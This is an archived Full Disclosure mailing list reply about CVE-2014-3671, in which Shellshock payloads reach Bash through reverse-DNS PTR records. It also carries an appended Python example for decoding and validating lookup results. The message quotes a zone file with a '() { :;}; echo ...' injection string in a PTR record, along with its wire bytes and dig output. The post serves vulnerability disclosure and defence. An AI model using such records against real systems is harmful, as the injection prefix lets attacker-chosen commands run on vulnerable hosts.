Full Disclosure mailing list archives

Re: CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et al.)


From: Dirk-Willem van Gulik <dirkx () webweaving org>
Date: Tue, 14 Oct 2014 15:45:34 +0100


On 14 Oct 2014, at 13:04, Florian Weimer <fw () deneb enyo de> wrote:

> A simple zone file; such as:
> 
>     $TTL 10;
>     $ORIGIN in-addr.arpa.
>     @     IN SOA     ns.boem.wleiden.net dirkx.webweaving.org (
>                    666        ; serial
>                    360 180 3600 1800 ; very short lifespan.
>                    )
>     IN          NS     127.0.0.1
>     *           PTR      "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 
> 
> I'm surprised DNS servers grok this, should be
> 
> * IN PTR \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS.
> 
> Or something similar.

The production versions of NSD accept this fine ‘as is’ (FreeBSD-9.3); bind requires a bit of careful escaping.

On the wire one then sees the raw ‘binary’ — which can indeed be very raw:

000001d0  XX XX XX XX 31 28 29 20  7b 20 3a 3b 7d 3b 20 65        () { :;}; e|
000001e0  63 68 6f 20 63 76 65 2d  32 30 31 34 2d 36 32 37  |cho cve-2014-627|
000001f0  31 2c 20 63 76 65 2d 32  30 31 34 30 37 31 36 39  |1, cve-201407169|
00000200  2c 20 72 64 6e 73 c0 14  c0 XX XX XX XX XX XX XX  |, rdns

And once you push this through DIG - one sees:

        4.3.2.1.in-addr.arpa.   10      IN      PTR     \(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa.

depending on your escaping (which normal unix libc/resolve does). And then we found at least one setenv() which would 
*de-escape* above nicely - getting the octal and decimal right.

Dw.
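Added example, not part of the message above or of any of the software it names: it renders a raw PTR label the way dig/libc escape it (RFC 1035 \DDD, decimal), decodes it back the way a de-escaping setenv() effectively would, and shows the gate a defender wants in front of the environment: validate the *decoded* reverse-lookup name against the hostname grammar before it becomes REMOTE_HOST or similar. Assumes Python 3; the sample string is the dig output quoted in the message.

```python
import re

# Sample taken from the dig output quoted above: a PTR target in RFC 1035
# presentation form. \DDD is DECIMAL there (\032 = 0x20, a space); a C-style
# octal reading of \032 would give 0x1a, which is the octal/decimal trap.
DIG_PTR_TARGET = (r"\(\)\032{\032:\;}\;\032echo\032cve-2014-6271,"
                  r"\032cve-201407169,\032rdns.in-addr.arpa.")

# Characters that dig/libc escape with a single backslash inside a label.
_SPECIAL = set('"()\\;@$.')
# One RFC 1123 hostname label: alnum, optional inner hyphens, max 63 chars.
_LABEL = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def escape_label(raw: bytes) -> str:
    """Render one raw label as a resolver prints it: \\DDD (decimal) for
    non-printables, backslash for master-file specials, the rest verbatim
    (note that { } , : pass through unescaped, as in the dig output)."""
    out = []
    for b in raw:
        c = chr(b)
        if b < 0x21 or b > 0x7E:
            out.append("\\%03d" % b)
        elif c in _SPECIAL:
            out.append("\\" + c)
        else:
            out.append(c)
    return "".join(out)


def unescape_name(name: str) -> str:
    """Undo presentation escaping. This restores the original bytes exactly,
    which is why the escaping seen in dig output is not sanitisation."""
    out, i = [], 0
    while i < len(name):
        if name[i] != "\\":
            out.append(name[i]); i += 1
        elif len(name[i + 1:i + 4]) == 3 and name[i + 1:i + 4].isdigit():
            out.append(chr(int(name[i + 1:i + 4]))); i += 4   # decimal, not octal
        elif i + 1 < len(name):
            out.append(name[i + 1]); i += 2
        else:
            raise ValueError("dangling backslash in name")
    return "".join(out)


def is_safe_hostname(name: str) -> bool:
    """Gate for reverse-lookup results before they reach the environment:
    decode first, then require every label to be a plain RFC 1123 label."""
    decoded = unescape_name(name).rstrip(".")
    if not decoded or len(decoded) > 253:
        return False
    return all(_LABEL.match(lbl) for lbl in decoded.split("."))
```

A lookup result that fails is_safe_hostname() should be dropped (or replaced by the literal IP address) rather than exported, regardless of which resolver produced it.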


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/